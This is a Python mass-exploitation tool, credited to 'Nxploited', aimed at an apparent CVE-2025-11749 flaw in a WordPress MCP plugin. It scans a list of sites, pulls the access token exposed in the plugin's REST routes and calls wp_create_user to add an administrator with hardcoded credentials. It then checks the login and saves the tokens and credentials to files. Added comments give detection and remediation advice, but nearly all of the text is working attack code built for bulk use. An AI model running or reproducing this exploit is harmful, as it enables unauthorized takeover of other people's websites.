# encoding: utf-8
# by: Nxploited ( Khaled Alenazi )
# Telegram: https://t.me/KNxploited
# GitHub: https://github.com/Nxploited
import threading
import requests
import time
import os
import sys
import urllib3
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich.theme import Theme
from rich import box
from random import randint
import json
# Rich colour theme: named styles used by every console message in this script.
init_theme = Theme({
"banner": "bold white on rgb(34,49,63)",
"usage": "bold bright_cyan on rgb(27,37,47)",
"info": "bold bright_magenta on rgb(31,31,37)",
"success": "bold white on green",
"error": "bold white on red",
"detect": "bold yellow on rgb(27,74,198)",
"progress": "bold magenta",
"highlight": "bold cyan on rgb(8,15,34)",
"tokenid": "bold white on rgb(38,154,16)",
"inputbox": "bold bright_magenta on rgb(27,74,198)",
})
console = Console(theme=init_theme)
# Suppresses urllib3's InsecureRequestWarning; the requests sent to targets
# further down pass verify=False, so TLS certificates are not validated.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# NOTE(review): presumably tells requests to bypass any configured proxy for
# all hosts -- confirm against the requests documentation.
os.environ['NO_PROXY'] = '*'
# Output files; the writer helpers below open them in append mode.
Nxploited_success_file = "success_results.txt"
Nxploited_admin_file = "created_admins.txt"
Nxploited_tokens_file = "tokens_only.txt"
# Fixed account values placed in the wp_create_user call, plus the static
# User-Agent sent with every request to a target.
# Defender note: because these values are constants, they are usable
# indicators -- look for this login name in the WordPress user table and for
# this exact User-Agent string on /wp-json/mcp/v1/ requests in access logs.
# A modified copy of the script can change them, so treat a miss as
# inconclusive.
target_username = "nxploited"
target_password = "StrongPass!321"
target_email = "[email protected]"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Record a harvested token: when `token` is non-empty after stripping
# whitespace, append "<target> | token: <token>" to tokens_only.txt and echo
# the same pair to the console. Does nothing for a missing or blank token.
# Defender note: the token is stored in plain text, so any value that appears
# in such a file should be treated as disclosed and rotated on the site.
def Nxploited_write_token(target, token=None):
if token and token.strip():
with open(Nxploited_tokens_file, "a") as f:
f.write(f"{target} | token: {token}\n")
txt = f"[white]{target}[/white] | [bold cyan]token:[/bold cyan] [yellow]{token}[/yellow]"
console.print(txt, style="tokenid")
# Print the ASCII-art banner line by line, each line in a randomly chosen RGB
# colour with a 2 ms pause between lines, followed by the tool's subtitle.
# Purely cosmetic; no network or file activity.
def professional_banner():
banner = """
=====================================================================================================================================
=== == ==== = ============= ===== ===== ==== ============= ======= ==== ====== ===== ===
== === = ==== = ================= = == == == = == =================== ====== ==== ===== ===== ==== === =
= ======= ==== = ================ === = ==== = === = ==================== ======= ========== ===== === ===== =
= ======= ==== = ===================== == ==== ====== == = =============== ======= ========= ===== = === ===== =
= ======= == = === ===== === ==== ===== === === == ==== ======= ======== ===== == ==== === =
= ======== == == =================== ==== ==== ==== ==== ===== ============= ======= ======= ===== === ====== = =
= ======== == == ================== ===== ==== === ============ ============= ======= ======= ===== ======== =
== === === === ================= ====== == == ====== ==== ============== ======= ======= ========== === ===== =
=== ===== ==== ========== === == ==== ============= === ===== ========== ==== ==
=====================================================================================================================================
"""
for line in banner.splitlines():
# A fresh random colour is picked for every banner line.
color = f"rgb({randint(34,85)},{randint(49,160)},{randint(63,255)})"
console.print(Text(line,style=color), style="banner")
time.sleep(0.002)
console.print("\n")
subtitle = "[highlight]Mass MCP Exploit | By: Khaled Alenazi (Nxploited)[/highlight]"
console.print(subtitle, style="info")
# Print a static usage panel: input file format, how the script is started,
# and the three output files it writes.
# Defender note: the script file name shown in the panel references
# CVE-2025-11749; the vendor advisory for that CVE is the authoritative source
# for affected and fixed plugin versions.
def show_usage_panel():
usage = (
"[usage]How to Use:[/usage]\n\n"
"[highlight]Step 1:[/] Place all target URLs in [bold]list.txt[/] (one URL per line).\n"
"[highlight]Step 2:[/] Run from terminal: [bold cyan]python CVE-2025-11749.py[/bold cyan]\n"
"[highlight]Step 3:[/] After pressing ENTER, enter the targets file and number of threads.\n"
"[highlight]Step 4:[/] Results saved to:\n"
" [bright_cyan]Success targets:[/] [bold]success_results.txt[/]\n"
" [bright_cyan]Created admins:[/] [bold]created_admins.txt[/]\n"
" [bright_cyan]Tokens:[/] [bold]tokens_only.txt[/]\n"
)
console.print(Panel(usage, box=box.ROUNDED, style="usage", border_style="cyan"))
# Block until the operator presses ENTER; on Ctrl+C print an exit panel and
# terminate the process with status 0.
def wait_enter():
msg = "[inputbox]Press ENTER to start exploitation or Ctrl+C to exit...[/inputbox]"
console.print(Panel(msg, box=box.ROUNDED, style="info"))
try:
input()
except KeyboardInterrupt:
console.print(Panel("[error]Exiting...[/error]", style="error"))
sys.exit(0)
# Prompt interactively for the targets file name and the thread count.
# Despite the name, nothing is read from the command line here.
# Returns (list_file, threads); threads falls back to 10 when the answer is
# not a positive integer.
def Nxploited_parse_args():
list_file = console.input("[inputbox]Enter target file name (e.g., list.txt):[/inputbox] ").strip()
threads = console.input("[inputbox]Enter number of threads (default 10):[/inputbox] ").strip()
if not threads.isdigit() or int(threads) < 1:
threads = 10
else:
threads = int(threads)
return list_file, threads
# Connectivity gate: loop until a HEAD request to https://www.google.com
# completes (4 s timeout), printing a message and sleeping 5 s after each
# failure. Returns True once a request succeeds; never returns False.
def Nxploited_internet_check():
while True:
try:
requests.head("https://www.google.com", timeout=4)
return True
except Exception:
console.print("[error]Internet disconnected. Waiting to resume...", style="error")
time.sleep(5)
# Read the targets file and return a list of URLs: one per non-blank line,
# whitespace-stripped, with "http://" prepended when the line has no
# http:// or https:// scheme (case-insensitive check).
def Nxploited_read_targets(filename):
targets = []
with open(filename, "r") as f:
for line in f:
url = line.strip()
if url:
if not url.lower().startswith(('http://', 'https://')):
url = 'http://' + url
targets.append(url)
return targets
# Append `msg` plus a newline to `filename` (opened in append mode).
def Nxploited_write_result(filename, msg):
with open(filename, "a") as f:
f.write(f"{msg}\n")
# Fingerprinting step: fetch the site's REST index (<target>/wp-json/) and
# return True when any advertised route starts with /mwai/v1/ or /mcp/v1/.
# Any request or parsing error is swallowed and reported as False.
# No credentials are sent, so the check relies only on what the index lists
# to an anonymous client.
# Defender note: this is a presence check, not a vulnerability check -- it
# does not look at the plugin version. The same lookup (GET /wp-json/ and
# inspect "routes") lets a site owner confirm whether these namespaces are
# exposed on their own installation.
def check_plugin_installed(target_url):
try:
resp = requests.get(f"{target_url.rstrip('/')}/wp-json/", headers={'User-Agent': user_agent}, verify=False, timeout=10)
data = resp.json()
routes = list(data.get('routes', {}).keys())
mwai_found = any(r.startswith("/mwai/v1/") for r in routes)
mcp_found = any(r.startswith("/mcp/v1/") for r in routes)
return mwai_found or mcp_found
except Exception:
return False
# Read the /wp-json/mcp/v1/ namespace index and search its "routes" for an
# entry shaped like mcp/v1/<segment>/.../sse. The third path segment is taken
# as the access token, recorded via Nxploited_write_token, and returned.
# Returns None when no such route is listed or when any error occurs (errors
# are silently swallowed).
# Defender note: everything else in the script depends on this step -- a
# secret carried in a route path that the namespace index lists to a client
# sending no credentials. Remediation has two parts: update the plugin to a
# release that no longer lists the route, and rotate the token afterwards,
# since a value that was already listed remains usable until it is changed.
def find_token(target_url):
try:
resp = requests.get(f"{target_url.rstrip('/')}/wp-json/mcp/v1/", headers={'User-Agent': user_agent}, verify=False, timeout=15)
j = resp.json()
for route in j.get("routes", {}):
parts = route.strip("/").split("/")
if len(parts) >= 4 and parts[0] == "mcp" and parts[1] == "v1" and parts[-1] == "sse":
token = parts[2]
# Reject values that still contain a path separator.
if token and "/" not in token and "\\" not in token:
Nxploited_write_token(target_url, token=token)
return token
# Second pass over the same route list, using a prefix/suffix match.
found = [x for x in j.get("routes", {}) if x.startswith("/mcp/v1/") and x.endswith("/sse")]
if found:
token = found[0].split("/")[4]
if token and "/" not in token and "\\" not in token:
Nxploited_write_token(target_url, token=token)
return token
except Exception:
pass
return None
# Open the server-sent-events endpoint <target>/wp-json/mcp/v1/<token>/sse as
# a streaming GET and return the value of the first non-empty "id:" line.
# Reading stops after roughly the first 20 lines; returns None when no id is
# seen or when any error occurs.
# The token in the URL path is the only credential-like value sent.
# Defender note: a GET with "Accept: text/event-stream" to a path under
# /wp-json/mcp/v1/ from a client that is not a known MCP integration is worth
# alerting on in access logs or at a WAF.
def get_session_id(target_url, token):
url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse"
headers = {
"Accept": "text/event-stream",
"Connection": "keep-alive",
"Cache-Control": "no-cache",
"User-Agent": user_agent
}
try:
with requests.get(url, headers=headers, verify=False, timeout=10, stream=True) as resp:
for idx, line in enumerate(resp.iter_lines(decode_unicode=True)):
if line:
line_str = line.strip()
if line_str.startswith("id:"):
session_id = line_str.split("id:", 1)[-1].strip()
if session_id:
return session_id
# Give up once the line index passes 20 without an id.
if idx > 20:
break
except Exception: pass
return None
# POST a JSON-RPC 2.0 "tools/call" request naming the wp_create_user tool to
# <target>/wp-json/mcp/v1/<token>/sse, asking for an account with the
# module-level login, e-mail and password and the role "administrator".
# Returns (True, "<target> | <user>:<password> | <detail>") when the response
# content contains text that looks like a creation message, or
# (True, "<target> | <user>:<password>") on HTTP 204; otherwise
# (False, <parsed JSON or {}>), or (False, <error string>) if the request
# itself raised.
# Defender note: the impact is a new WordPress administrator created without
# a WordPress login. Useful detections: POST bodies to /wp-json/mcp/v1/*
# containing both "tools/call" and "wp_create_user"; administrator accounts
# whose creation time matches such a request; user-registration events with
# no corresponding wp-admin session. After patching, review the full
# administrator list rather than only this script's default login name,
# because the values are trivially changed.
def try_exploit(target_url, token, session_id):
exploit_url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse"
payload = {
"jsonrpc": "2.0",
"id": 1337,
"method": "tools/call",
"params": {
"name": "wp_create_user",
"arguments": {
"user_login": target_username,
"user_email": target_email,
"user_pass": target_password,
"role": "administrator"
}
}
}
try:
resp = requests.post(
exploit_url,
headers={'Content-Type':'application/json', 'User-Agent':user_agent},
data=json.dumps(payload),
verify=False, timeout=30
)
# A non-JSON body is treated as an empty result rather than an error.
try:
res_json = resp.json()
except Exception:
res_json = {}
try:
result = res_json.get("result", {})
content = result.get("content", [])
found_success = False
created_id = None
# Scan the returned content items for text that indicates creation.
for item in content:
if isinstance(item, dict):
if "text" in item:
text = item["text"]
if "User created" in text and "ID" in text:
found_success = True
created_id = text
elif "success" in text or "created" in text:
found_success = True
if found_success:
break
if found_success:
return True, f"{target_url} | {target_username}:{target_password} | {created_id if created_id else ''}"
except Exception:
pass
# An empty 204 reply is also counted as success.
if resp.status_code == 204:
return True, f"{target_url} | {target_username}:{target_password}"
return False, res_json
except Exception as e:
return False, str(e)
# Submit the given username and password to <target>/wp-login.php in a fresh
# requests.Session and return True when any of these holds: a cookie whose
# name contains "wordpress_logged_in" was set, the final URL contains
# "dashboard" or "/wp-admin", or the response body contains "wp-admin".
# Returns False on any exception.
# Defender note: in access logs this appears as a POST to /wp-login.php from
# the same client and User-Agent shortly after the /wp-json/mcp/v1/ requests;
# correlating the two is a stronger signal than either alone.
def login_and_confirm(target_url, username, password):
login_url = f"{target_url.rstrip('/')}/wp-login.php"
session = requests.Session()
try:
response = session.post(
login_url,
verify=False,
data={
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log+In'
},
headers={"User-Agent": user_agent}
)
logged_in = any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
success_conditions = [
logged_in,
'dashboard' in response.url.lower(),
'/wp-admin' in response.url.lower(),
'wp-admin' in response.text
]
return any(success_conditions)
except Exception:
return False
# Print a summary panel for one target: its URL, the wp-login.php address,
# the module-level username and password, and whether the follow-up login
# check passed. Console output only; nothing is written to disk here.
def print_success_box(target_url, login_success):
panel_text = (
f"\n[bold white on green]✔️ Exploitation Successful![/bold white on green]\n"
f"[bold blue]Target:[/] [bold white]{target_url}[/]\n"
f"[bold blue]WP Admin:[/] [bold green]{target_url.rstrip('/')}/wp-login.php[/]\n"
f"[bold magenta]Username:[/] [white]{target_username}\n"
f"[bold magenta]Password:[/] [white]{target_password}\n"
f"[bold yellow]Dashboard login: {'SUCCESSFUL' if login_success else 'FAILED'}[/bold yellow]\n"
)
console.print(Panel(panel_text, box=box.DOUBLE, style="success", border_style="green"))
# Thread body: run the full sequence against each target in `targets`,
# moving on to the next target as soon as a step fails. `thread_id` is
# accepted but not used in this body.
# Per-target request order, as issued by the helpers called here:
#   GET  /wp-json/                     (check_plugin_installed)
#   GET  /wp-json/mcp/v1/              (find_token)
#   GET  /wp-json/mcp/v1/<token>/sse   (get_session_id)
#   POST /wp-json/mcp/v1/<token>/sse   (try_exploit)
#   POST /wp-login.php                 (login_and_confirm)
# Defender note: this fixed order from one client within a short window is a
# usable log-correlation pattern. Results are written to the output files
# only when the login check passes; in the other branch the script itself
# reports that the account was created, so a site can hold the new
# administrator even when the tool recorded nothing -- audit accounts on the
# site, not tool output.
def Nxploited_worker(thread_id, targets):
for target in targets:
# Blocks until outbound connectivity is confirmed before each target.
Nxploited_internet_check()
if not check_plugin_installed(target):
console.print(f"{target} | Plugin not installed or not vulnerable.", style="error")
continue
else:
console.print(f"{target} | Plugin detected or vulnerable, exploiting...", style="detect")
token = find_token(target)
if not token:
console.print(f"{target} | Token not found, skipping.", style="error")
continue
session_id = get_session_id(target, token)
if not session_id:
console.print(f"{target} | Could not get session_id, skipping.", style="error")
continue
success, detail = try_exploit(target, token, session_id)
if not success:
console.print(f"{target} | Exploit failed.", style="error")
continue
login_success = login_and_confirm(target, target_username, target_password)
print_success_box(target, login_success)
if login_success:
Nxploited_write_result(Nxploited_success_file, f"{target} | {token} | {session_id}")
Nxploited_write_result(Nxploited_admin_file, detail)
else:
console.print(f"{target} | Admin created but login FAILED (credentials not saved).", style="error")
# Split `lst` into `n` interleaved slices: slice i holds elements i, i+n,
# i+2n, ... Always returns exactly n lists; some are empty when lst has fewer
# than n elements.
def Nxploited_chunkify(lst, n):
return [lst[i::n] for i in range(n)]
# Interactive entry flow: show the banner and usage panel, wait for ENTER,
# prompt for the targets file and thread count, split the targets into one
# slice per thread, run Nxploited_worker on each slice in a daemon thread,
# wait for all threads to finish, then print where results were written.
def Nxploited():
professional_banner()
show_usage_panel()
wait_enter()
list_file, num_threads = Nxploited_parse_args()
targets = Nxploited_read_targets(list_file)
console.print(Panel(
f"Preparing threads...",
box=box.ROUNDED, style="highlight", border_style="blue"
))
time.sleep(0.5)
# One interleaved slice of the target list per worker thread.
target_chunks = Nxploited_chunkify(targets, num_threads)
threads = []
for i in range(num_threads):
th = threading.Thread(target=Nxploited_worker, args=(i, target_chunks[i]))
th.daemon = True
th.start()
threads.append(th)
# Wait for every worker before printing the summary.
for th in threads:
th.join()
console.print(Panel(
f"All targets processed.\nCheck [bold green]{Nxploited_success_file}[/] for successes.\nAdmin accounts saved in [bold green]{Nxploited_admin_file}[/]\nTokens saved in [bold green]{Nxploited_tokens_file}[/]",
box=box.DOUBLE, style="highlight", border_style="cyan"
))
# Run the interactive flow only when the file is executed as a script, not
# when it is imported.
if __name__ == "__main__":
Nxploited()